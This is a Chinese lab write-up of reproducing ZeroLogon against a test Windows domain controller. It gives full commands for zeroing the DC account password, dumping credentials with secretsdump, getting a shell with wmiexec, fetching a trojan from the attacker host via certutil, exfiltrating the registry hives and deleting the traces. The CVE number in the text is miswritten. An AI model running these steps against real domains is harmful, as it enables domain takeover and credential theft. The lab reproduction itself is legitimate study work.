首页 > 其他分享 >zerologon复现

zerologon复现

时间:2023-02-24 20:01:41浏览次数:31  
标签:zerologon hash py 192.168 复现 域控 save com

zerologon漏洞复现

目录

漏洞介绍

CVE-2020-14722 (又称ZeroLogon)
是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。

实验环境

攻击机:192.168.1.8 ubuntu
域控服务器:192.168.1.6 win2008r2
成员机:192.168.1.7 win7

实验开始

一、在github上下载脚本

git clone https://github.com/SecuraBV/CVE-2020-1472.git
git clone https://github.com/SecureAuthAuthCorp/impacket.git

由于我之前已经已经拉过了,就不放图了

二、检测是否可以利用

nbtstat -A 192.168.1.6 #查看域控主机名

image

域控主机名为WIN-E42RAKP2TJ2

python3 zerologon_tester.py  WIN-E42RAKP2TJ2 192.168.1.6 #检测是否可以利用,相当于poc

image

可以利用

三、利用漏洞

1.清空域控账号密码
git clone https://github.com/dirkjanm/CVE-2020-1472.git
python3 cve-2020-1472-exploit.py LLPP 172.16.124.194 #清空

image

2.导出admin凭证
secretsdump.py lpone.com/LLPP\[email protected] -no-pass >1.txt #导出admin的凭证

image

这里我找错example路径了,注意路径

3.登录域控主机
wmiexec.py [email protected] -hashes (上一步的hash值)

image

恢复域控原始hash

一、导出源文件

1.生成文件

先前清空的hash 为内存的hash,磁盘的hash没有变化。

reg save HKLM\SYSTEM system.save 
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

image

2.上传shell

这里我用的kali的msf,因为ubuntu的msf端口反弹不回来(关闭ssh服务可以利用22端口)

certutil -urlcache -split -f http://192.168.1.8/muma.exe

image

3.导出文件
download sam.save
download system.save
download security.save

image

4.删除痕迹
del -f *.save

image

二、解析文件

目的是获取原账户的hash值

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL 

image

三、还原hash

1.还原
python3 restorepassword.py sshh.com/WIN-E42RAKP2TJ2@WIN-E42RAKP2TJ2 -target-ip 192.168.1.6 -hexpass 1b23bf335553baf29a8f78dee4b9b5a0

image

2.检测

检测是否还原

python3 secretsdump.py sshh.com/WIN-E42RAKP2TJ2\[email protected] -no-pass

image

还原成功!

标签:zerologon,hash,py,192.168,复现,域控,save,com
From: https://www.cnblogs.com/lisyr44/p/17152955.html

相关文章

  • 复现:西湖论剑2022
    mp3用MP3stego无密码解密mp3,得到txt   用binwalk分析mp3,发现有png,用foremost提取 用zsteg分析png,发现藏有zip,提取出来   zip加密了一个47.txt,用前面得......
  • CouchDB 漏洞复现 CVE-2017-12635/12636
    前言CouchDB是一个开源的面向文档的数据库管理系统,可以通过RESTfulJavaScriptObjectNotation (JSON)API 访问。CVE-2017-12635是由于Erlang和JavaScript对JSON解......
  • Apache SSI远程命令执行漏洞复现
    漏洞原理:当目标服务器开启了SSI与CGI支持,就可以上传shtml文件,并利用语法执行任意命令,例如<!--#execcmd=”ls”-->,cmd后面跟要执行的命令。漏洞复现:启动环境,拉取镜像:漏......
  • 向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672
    前言向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。于2022年2月5日和2022年2月15日,CNVD公开上海......
  • Apache SSI远程命令执行漏洞复现
    漏洞原理shtml不是html而是一种服务器API,shtml是服务器动态产生的html。两者都是超文本格式,但shtml是一种用于SSI(ServcieSideInclude,服务器端包含指令)技术的......
  • 漏洞复现-docker未授权rce
    0x00实验环境攻击机:Ubuntu靶场:vulhub搭建的靶场环境 0x01影响版本 dockerAPI(1.37及其他版本)未授权访问漏洞,开放2375监听容器时,会调用这个API,方便docker集群管理......
  • 西湖论剑2023复现
    MessageBoard​​​​格式字符串漏洞获取栈地址,下一处读入利用栈地址获取libc基址payload=p64(stack_addr+0xb0+0x28)#rbppayload+=p64(pop_rdi)+p64(elf.got["......
  • CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现
    免责声明文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!GoAnywhereMFTGoAnywher......
  • Tomcat漏洞(CVE-2017-12615)复现
     漏洞原理:漏洞原理:Tomcat配置文件/conf/web.xml配置了可写(readonly=false),导致可以使用PUT方法上传任意文件,攻击者将精心构造的payload向服务器上传包含任意代码的JSP......
  • Tomcat任意文件写入(CVE-2017-12615)漏洞复现
    一、漏洞原理Tomcat设置了写权限(readonly=false)我们可以向服务器写入文件<servlet><servlet-name>default</servlet-name><servlet-class>org.apache.catalina......